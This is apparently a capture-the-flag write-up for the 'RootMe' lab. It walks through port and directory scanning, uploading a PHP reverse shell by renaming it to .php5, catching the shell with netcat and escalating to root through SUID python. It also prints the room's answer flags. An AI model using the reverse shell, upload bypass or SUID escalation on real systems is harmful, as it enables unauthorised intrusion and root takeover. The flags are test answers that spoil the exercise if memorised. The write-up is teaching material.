>rootme – slash parity

Table of Contents

Task 1. Start the machine

Task 2. Reconnaissance

Question 1.

Scan the machine, how many ports are open?

Scan the target

#nmap -A -p- 10.x.x.x

Found 2 ports open 22,80

Output

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

Question 2.

What version of Apache is running?

From the nmap scan we can see that the Apache version is 2.4.29

Question 3.

What service is running on port 22?

From the scan output we can see that the service running on port 22 is SSH

Answer 3.

Question 4.

Find directories on the web server using the GoBuster tool.

# gobuster -h

Output

Usage:

gobuster [command]

Available Commands:

dir Uses directory/file enumeration mode

dns Uses DNS subdomain enumeration mode

fuzz Uses fuzzing mode

help Help about any command

s3 Uses aws bucket enumeration mode

version shows the current version

vhost Uses VHOST enumeration mode

Flags:

–delay duration Time each thread waits between requests (e.g. 1500ms)

-h, –help help for gobuster

–no-error Don’t display errors

-z, –no-progress Don’t display progress

-o, –output string Output file to write results to (defaults to stdout)

-p, –pattern string File containing replacement patterns

-q, –quiet Don’t print the banner and other noise

-t, –threads int Number of concurrent threads (default 10)

-v, –verbose Verbose output (errors)

-w, –wordlist string Path to the wordlist

We will use the following switches.

-w : path to wordlist

-u : url

dir : directory bruteforce

# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.47.229 >2 /dev/null

Scan returned five directories

Output

/uploads (Status: 301) [Size: 314] [–> http://10.10.47.229/uploads/]

/css (Status: 301) [Size: 310] [–> http://10.10.47.229/css/]

/js (Status: 301) [Size: 309] [–> http://10.10.47.229/js/]

/panel (Status: 301) [Size: 312] [–> http://10.10.47.229/panel/]

/server-status (Status: 403) [Size: 277]

Note

Status code 301 : The HTTP response status code 301 Moved Permanently is used for permanent redirecting, meaning current links or records using the URL this response is received for should be updated.

Status code 403 : The HTTP 403 Forbidden client error status response code indicates that the server understood the request but refuses to authorize it.

This status is similar to 401, but in this case, re-authenticating will make no difference. The access is permanently forbidden and tied to the application logic, such as insufficient rights to a resource.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/403

The >2 /dev/null at the end is used to redirect any errors that might occur during the scan

Question 5.

What is the hidden directory?

Answer 5.

/panel/

Task 3. Getting a Shell

Question 1.

Find a form to upload and get a reverse shell, and find the flag.

Hint

Search for “file upload bypass” and “PHP reverse shell”.

Before searching on google what the Hint mentions, I tried using the php-reverse shell from Laundanum collection that comes with Kali Linux. It can be found in the following path

/usr/share/laudanum/php/

We need to edit the php-reverse-shell.php file.

#nano php-reverse-shell.php

Change the parameter $ip to your local machine ip and $port to any port that you know will not be blocked on your local machine.

Save and exit the document.

Output

set_time_limit (0);

$VERSION = “1.0”;

$ip = ‘10.10.139.4’; // CHANGE THIS

$port = 1234; // CHANGE THIS

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = ‘uname -a; w; id; /bin/sh -i’;

$daemon = 0;

$debug = 0;

Upload the file

Unfortunately you are not allowed to upload php files on the website, so we are back to google. Turns out we can trick the upload mechanism by renaming our file from .php to .php5

After rename we can successfully upload the file.

Getting the shell

Next we need to start netcat in order to get the reverse shell. We will use the following command and switches.

# nc -lvnp 1234

-l listen mode, for inbound connects

-n numeric-only IP addresses, no DNS

-v verbose

-p local port number

Once we have nc setup it’s time to run the reverse shell script.

We have successfully uploaded the shell to the sever so in order to execute it we need to navigate to the folder containing the uploaded file.

Going back to Gobuster’s output we found a directory named /uploads. Navigate to that directory. Sure enough the file is there. Click on the file and let’s have a look on netcat.

Output

# nc -vnlp 1234

listening on [any] 1234 …

connect to [10.9.4.125] from (UNKNOWN) [10.10.139.4] 46402

Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

13:14:58 up 27 min, 0 users, load average: 0.07, 0.02, 0.06

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can’t access tty; job control turned off

We are in, now all that’s left is to locate the flag. The file containing it is called user.txt

A simple find command gives us the location.

$ find / -type f -name user.txt 2> /dev/null

/var/www/user.txt

$ cat /var/www/user.txt

THM{y0u_g0t_a_sh3ll}

Note

Laudanum is a collection of injectable files, designed to be used in a pentest when upload vulnerabilities, administrative interfaces, and SQL injection flaws are found. These files are written in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.

Task 4. Privilege Escalation

Now that we have a shell, let’s escalate our privileges to root.

Question 1.

Search for files with SUID permission, which file is weird?

Note

SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner.

If you create a script (owned by the root user) that needs the SUID bit set, you’d do so like:

$sudo chmod u+s filename

To search for the files with SUID permission we can use the following command.

# find / -type f -user root -perm -4000 2>/dev/null

–perm search for files with the specified permissions

-type f search for files only (not directories)

2> /dev/null suppress errors

-user search for files owned by the specified user

Output

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/lib/snapd/snap-confine

/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

/usr/lib/eject/dmcrypt-get-device

/usr/lib/openssh/ssh-keysign

/usr/lib/policykit-1/polkit-agent-helper-1

/usr/bin/traceroute6.iputils

/usr/bin/newuidmap

/usr/bin/newgidmap

/usr/bin/chsh

/usr/bin/python

From the output we find an interesting file at /usr/bin/python

Question 2.

Find a form to escalate your privileges.

Hint

Search for gtfobins
https://gtfobins.github.io/gtfobins/python/

Navigate to the SUID section, omit the first command.

Question 3.

root.txt

$ /usr/bin/python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’

After that, we are logged in as root, now let’s get the root.txt flag

# find -type f -name root.txt 2> /dev/null

# cat /root/root.txt

Output

THM{pr1v1l3g3_3sc4l4t10n}

Answer 3.

THM{pr1v1l3g3_3sc4l4t10n}